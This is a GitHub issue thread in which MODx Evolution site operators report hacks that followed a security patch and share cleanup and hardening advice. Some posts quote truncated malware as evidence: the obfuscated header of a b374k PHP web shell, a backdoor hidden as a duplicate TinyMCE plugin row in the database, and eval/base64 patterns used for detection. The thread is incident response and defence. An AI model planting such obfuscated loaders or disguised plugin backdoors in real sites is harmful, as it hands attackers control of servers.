### ISSUE TITLE
Lots of MODx Evolution 1.0.15 Sites are hacked AFTER security patch was applied

### ISSUE THREAD

**Issue by chrille38317** [modxcms/evolution#979]
Hello there!

Lots of our MODx Evolution sites (~30 out of 50) have been hacked tonight AFTER we have applied this security patch:

https://forums.modx.com/thread/101240/evo-security-patch-1-0-12-and-above

We've patched on 16th November, all sites looked OK, then. Today, many hosters have send us mails, that malicious code was detected. We must confirm that.

On many sites, infected files are located in manager/media/calendar/, e. g. manager/media/calendar/green.php which contains the typical signature

```
<?php
/*
	b374k 2.8
	Jayalah Indonesiaku
	(c)2013
	http://code.google.com/p/b374k-shell

*/
$s_pass = "";  // default password : b374k (login and change to new password)
$s_func="cr"."eat"."e_fun"."cti"."on";$b374k=@$s_func('$x,$y','ev'.'al'.'("\$s_pass=\"$y\";?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$b374k("rP2Hr
```
...and so on.

Any help is highly appreciated.

**Comment by Deesen** [comment]
Are you sure you cleaned up every single malicious file that has been uploaded in the past? Maybe you missed just 1 file, like the b374k-shell in any sub-sub-sub-directory.

**Comment by chrille38317** [comment]
Yes, in 2014, we had a similar attack and updated every installation to 1.0.15 from scratch. We flushed every file, and secured the assets-directory via .htaccess.

**Comment by wishbone-design** [comment]
as mentioned in the other post, I've been hacked, constantly new attacks.
You are writing of some securing of the assets-folder with .htaccess - could you help me with what I have to write? evo 1.04, btw. thx!
Isn't it possible to prevend the index.php to being changed?

**Comment by MrSwed** [comment]
try chmod -w index.php,
but it is not panacea - hacker can set write attr again

**Comment by dmi3yy** [comment]
Need look into db for duplicate plugins with hack. In manager dublicate hidden. If not delete, fix not help

Отправлено с iPhone

**Comment by chrille38317** [comment]
Yes, of course. Back in 2014 (or was it 2015?), we've checked the database for malicious code as well. I presume, we had pretty clean installations since then. From my perspective, the recent attack is using a new vulerability.

@wishbone-design
We've placed the following .htaccess in the assets-folder:
`<FilesMatch "\.(php|tpl)$">
    Order allow,deny
    Deny from all
</FilesMatch>`

**Comment by MrSwed** [comment]
https://github.com/modxcms/evolution/issues/919#issuecomment-263204578

**Comment by MrSwed** [comment]
@dmi3yy 
is it make sense to make the name unique in the table with plugins? 
ALTER TABLE `modx_site_plugins` ADD UNIQUE KEY `name` (`name`);

**Comment by wishbone-design** [comment]
> try chmod -w index.php,
excuse me pls, where to write that?
which are the minimum permissions for the index.php?

**Comment by MrSwed** [comment]
@wishbone-design 
by ftp or ssh

**Comment by wishbone-design** [comment]
thx everybody, I chagend the permissions for the index.php to 444 and put the .htaccess into the assets folder.
At the moment, it's quiet.

**Comment by wishbone-design** [comment]
Two files are being hacked also:
siteCache.idx.php
sitePublishing.idx.php
in assets/cache
which are the min permissions?

what are the min permissions for the folders (and subfolders) inside manager (actions, frames, media, includes, processors)? there have been changes also...

**Comment by chrille38317** [comment]
Now, I found malicious code in the databases of one project as well:
```
INSERT INTO `modx_XXXXXXXXX_site_plugins` VALUES (22,'TinyMCE Rich Text Editor ','<strong>3.5.11</strong> Javascript WYSIWYG Editor',0,13,0,'/*require MODX_BASE_PATH.\'assets/plugins/tinymce/plugin.tinymce.php\';\n\n\n\n\n/*  end plugin code  */ \n\n\n \n\n\neval(base64_decode(\"QGVycm9yX3JlcG9ydGluZygwKTsKQGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7CkBpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsKCiRH
```
...and so on.

We backup our servers every day. The hack on this project happened between 23rd and 24th November. Everything was absolutely OK before. Again: We've added the patches from 

https://forums.modx.com/thread/101240/evo-security-patch-1-0-12-and-above

on 16th November, all of our assets were locked by .htaccess and all of our file permissions were as strict as possible. I assume, this is a new vulerability, not covered by the patch above.

**Comment by Deesen** [comment]
@MrSwed I guess unique key will not help, last hack did not rely on "same plugin-name".

**Comment by bossloper** [comment]
@chrille38317 - you said you patched on 16th. I think the patch was updated on 17th https://github.com/extras-evolution/security-fix/commits/master
So you might not have the updated patch?

**Comment by Deesen** [comment]
Also maybe this tool can help. For example it will list the hidden plugin https://github.com/extras-evolution/evocheck

**Comment by chrille38317** [comment]
WTF! Thx a lot @bossloper , we'll check that.

**Comment by MrSwed** [comment]
@Deesen 
yeh.. also disabled plugins have same name..

**Comment by chrille38317** [comment]
Hmmm, the latest commit of https://github.com/extras-evolution/security-fix was 16 minutes ago.
I'm managing a lot of Evo projects. How often should I update them?

**Comment by matdave** [comment]
The latest commit doesn't seem to do a whole lot https://github.com/extras-evolution/security-fix/commit/f6cb20fdee86c356bac5dd03551c523e3a659f93 

What seems to have helped for me was adding the 6G .htaccess policy https://perishablepress.com/6g/

**Comment by chrille38317** [comment]
Patching a patch isn't a good way to handle security related issues. Maybe I'm wrong but was the patched patch announced somewhere else besides the Github commitment updates?

1.1 brings a package manager, which offers this security fix as well. It is dated by 11-11-2016. So, from my perspective, anyone, who installed the fix with the package manager, thought to be on the safe side, but wasn't. See screenshot from now:

![20161130_094029_snag-0000](https://cloud.githubusercontent.com/assets/24220104/20745410/8e007486-b6e1-11e6-9c9d-63c603ec5ed4.jpg)

Maybe I'm wrong and the package manager offered a newer version of the patch with an older date?

Is there a centralized documentation, how to harden MODx Evolution - at least a more thorough one than rtfm?

**Comment by sturple** [comment]
Hi @chrille38317 
I had a similar issue here is my findings.

* I had a plugin that was infected (Search Highlight ) was was duplicated, so two entries in database
* Lang files specifically bulgarian.inc.php and polish.inc.php had base64 code added.
* This file [send_message.processor.php](https://github.com/modxcms/evolution/blob/develop/manager/processors/send_message.processor.php) was the first one they targeted after the site was clean, and then added code 
* There was then many files like start.php, function.php, cache.php littered through out the file structure.

Were you seeing anything similar.
Did your hacks stop, and if so what version are you at

**Comment by modxuser** [comment]
@chrille38317 

What I think everyone should remember is that the guys who have fixed this issue do it in their own time, without any financial support whatsoever.

If it wasn't for these guys, no-one using Evo would have a safe site, they would all have to move to new CMS solutions.

This is not the first time that security holes have been fixed for free by the Evo community DEV team

This time around it was a massive attack, I agree that the management of things wasn't perfect, but we all have to take into consideration that the developers who spare their precious time are scattered all over the world in different timezones - so getting it all perfectly timed isn't exactly easy if you ask me.

Not only that, there is no support from MODX at all. They know about the hack, but haven't cared to post in the blog about it - simply because they don't want anything to do with Evo anymore.

When a bespoke site for Evo is up and running (which is in the talks), the support and notices will probably improve greatly. Also, the more people who help, the better and faster problems are sorted, fixed and patches can be released.

Sorry for my whinge, but these are the facts

**Comment by sturple** [comment]
Hi @chrille38317 ,
Not sure if this was in response to my comment, 
All im doing is providing information in case it might help in finding any other issues or if the issue I saw was resolved in a previous commit.
I am still monitoring my site and if those hackers, get back in then maybe this issue that i had needs to be looked into further.

We all appreciate the time and effort that goes into keeping Open source alive.

Regards.

**Comment by modxuser** [comment]
My opinion to hardening an install:

1) Rename Manager folder

2) Remove all snippets, plugins, modules and chunks that are not required / used by deleting them from the server and database

3)  CHMOD all folders and files appropriately - 755 is not the "be all - end all" solution (I use 400, 505, 600, 644, 705 + 755)

4) If the manager isn't used on a daily basis, slap a .htaccess in it and redirect

5) Where possible, remove all signs of MODX

6) Change file structure where possible - don't use the standard assets folder for images, file etc.

7) If possible forbid access to the assets folder

8) Use custom templates for snippets like Wayfinder - this removes the default class naming, jot ,wayfinder, ditto etc.

**Comment by modxuser** [comment]
@sturple 

I wrote my comment due to the amount of requests for help that have been made in the last week or so.

The majority seem to expect that Evo will be fixed "as a matter of course", but that in my opinion isn't so.

A lot of people take for granted that they can download Evo from the server. They use it freely and then expect that someone in the background will fix any problems when they arise.

The truth is, the people who are behind Evo are from the community, they are not MODX LLC employees, they do the work for free, in their spare time when they can. They are dotted all over the world and do their best at all times.

These guys (Back and Front End developers) have worked wonders in the last couple of years - they have brought Evo back to life and we should all be thankfull and help out where we can

Support requests should be made, but in-depth information needs to be provided, for example logs, port of entry if known, specific code if known, the list goes on.

At the end of the day we all benefit from the work these guys are doing, so we should all help where we can, be it in the forum or here answering questions or helping out with front or back-end code.

Sorry for moaning

**Comment by yama** [comment]
We are asking LLC to provide official explanation, to stop downloading v1.1, to provide download of v1.1.1 that resolved the vulnerability. However, we can not go forward because the information provided is insufficient. It seems that LLC is very busy, so someone needs to help with LLC.

**Comment by chrille38317** [comment]
Howdy folks,
I'm absolutely aware of the situation with Evo. I'm not a native English speaker and hope, I didn't sound too offensive. Shame on me, that I'm too busy to be an active part of the community. As one (really) early adopter of MODx Evo, the decision of the original developer team, to turn away from Evo, hit me very hard. So, thanks to the community, keeping it alive.

The current hacks were terrible, because we did patch all of our installations on the same day, the issues were announced. If we only knew about a newer patch, we could have re-patch them in the same speed.

We follow the MODx security bulletin and check the official forum on a regular basis. The information provided there are sparse. Because of that, my question was, if there is a centralized platform, where MODx Evolution Updates are offered? If it is here on Github, then it's OK for me, I just wanted to know it. ;)

If you had the pity being hacked, there is no way around to delete every folder and file besides your images, self made scripts and additional snippets and plugins, not provided by the standard installation. Then, make a fresh installation with the patched files. Pointing at or searching for a name of a compromised file is more or less useless, because most of them are randomly generated. This time, I simply found _manager/media/calendar/green.php_ very often.

As mentioned above, check the database for duplicate entries (snippets, modules, plugins) with base64-stuff in it.

After that, harden the installation as @modxuser mentioned. Unfortunately, I did most of the stuff he said. Fiddling around with the permissions is IMHO pretty useless against hacks. If you're running PHP as Fast-CGI, the first thing an attacker with a b374k-shell will do, is changing file permissions. This kind of security is indeed necessary, but more to prevent intrusion from your (co-located) server-neighbours.
As a matter of fact, we have a handful of installations on servers with PHP running as Apache module. There the Owner is the FTP-User, granting write access to some limited directories. Here, changing permissions via PHP-shell doesn't work - all of those installations have never been hacked.

We now try https://perishablepress.com/6g/, mentioned by @matdave.

Wish you luck to keep your installations clean.

**Comment by modxuser** [comment]
@chrille38317 you may want to [read this post](https://github.com/modxcms/evolution/issues/1031) ref. the 6G Firewall

**Comment by soydemadrid** [comment]
Hi I've also been hacked since cleaning up and patching my site.

Google Search Console is reporting lots of hits since to urls such as:

/index.php/condition/IefZN/dan/
/index.php/observe/r+1.pdf=RLRfJ
/index.php/31/ob+6.cgi=IIefI
/index.php/condition/reg+15.shtml=RAITI

When I visit these links they seem to just load my modx homepage, I can't see any spam mail going out or other dodgy looking stuff.

Is this similar to everyone else who has been hacked and can anyone help with finding the malicious code which I can't find. I've looked through plugins, database etc and ran some phpmyadmin searches which aren't showing anything so far...

Copied over all the plugins etc from a fresh install too but I don't know if there is something in my database if anyone can help?

**Comment by Deesen** [comment]
Maybe this patch-instruction helps?

At first we want to introduce a new tool called "Evocheck". It can be a great time-saver to find malicious code in files or DB. We recommend using it or a similar tool in case your site has been compromised. And even after your site is secured again, this tool can be useful to find any text in your installation.

https://github.com/extras-evolution/evocheck

1. Logout from manager
2. Download Security-Fix from https://github.com/extras-evolution/security-fix
3. Upload Security-Fix to your server via FTP, explicitly overwrite any existing file
4. Delete file cache/siteCache.idx.php manually by hand via FTP (do NOT use "Clear Cache"-button inside manager), because the hack hides in there too.
5. Use https://github.com/extras-evolution/evocheck to check for malicious plugins, inside its source-code you will find strange / suspicious code like below. If you don´t know what to do, please get technical support.
- <a href="https://www.google.com/search?q=base64+eval+hack">eval(base64_decode("cc6ebdef6a9f8fd3887455e23a2ec....</a>
- eval("base".128/2."_dec"."ode(.....)"
6. Remember ID of this plugin, which is probably the last added one, and use phpMyAdmin to manually delete it from table "site_plugins"
7. IMPORTANT: Repeat steps 3 + 4
8. IMPORTANT: In cases the security-fix did not work, there were additionally uploaded files / backdoors left on the server. Evocheck can help but still you need technical expertise to know what you are doing, i.e. using the right RegEx-terms to search. It is no one-click-solution!
9. In case of using any eForm or AjaxSearch on your site, test them on your live site.   

IMPORTANT: Last but not least, watch your server for at least a week to assure all backdoors have been found and removed.

**Comment by soydemadrid** [comment]
Hi thanks that's a good set of instructions for a cleanup. I ran the evocheck and cleaned up what I could find yesterday. I then clicked to get a security review and that'd fixed the issues reported in Search Console.

When logging in and checking Search Console today though there are more links which say they've been detected today.

What is odd though is that the links are all index.php/randomstuff/linkaddress - if I click any they just bring up the homepage of my site. The source code looks clean on the homepage from these links too.

So I think the site is clean but how do I get Google to see it as clean, and why are these index.php/linkaddress links not showing the "Page Not Found" page but rather jut the normal homepage?

Thanks again for any further help with this.

I've asked in Google Search Console for a

**Comment by pmfx** [comment]
@soydemadrid 
Had similar situation but requests (answered 404) were for "assets/files/index.php/something/somthing.pdf" or "assets/files/index.php/something/wDwIR".

You said that you don't see "Page not found". Did you set 404 page in MODX configuration?

**Comment by soydemadrid** [comment]
Hi thanks, yes I have a 404 setup. If I put a random address in like www.domain.com/test/ then I get the 404 page. But if I make up a random link from the index.php such as www.domain.com/index.php/test/ I still get the homepage.

This is why I'm wandering if I'm actually still hacked...

How do I get modx to show the 404 for index.php/somelink pages? Are all users on Evo able to type in any index.php/ramdonstuffhere links and get their homepage as I do, or is it to do with the hack?

Thanks

**Comment by markryder** [comment]
You are right, crafting a link like that does take you to the home page.
Think you may have to add specific rewrites to your htaccess for those specific links - depending on how many there are

**Comment by modxuser** [comment]
I think that's in general an Evo thing - try doing that on any Evo site (i've tried it on sites that haven't been hacked) and you will get the same

Checking the header info, you always get a 200 OK

I am not a back-end Dev, but I think this should be looked at as it shouldn't in my opinion be possible

I have also tested it on websites that have SEO Strict URLs active and it does the same

By rights it should give a 404

**Comment by modxuser** [comment]
@chrille38317 If this issue is resolved can you close it please, if you are not sure how to, take a [look here](https://github.com/modxcms/evolution/issues/1213)
